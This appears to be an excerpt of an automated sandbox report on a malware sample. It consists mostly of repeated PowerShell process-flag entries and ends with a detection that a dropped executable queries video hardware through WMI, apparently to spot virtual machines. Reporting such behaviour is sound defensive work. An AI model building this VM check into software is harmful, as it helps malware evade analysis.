                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
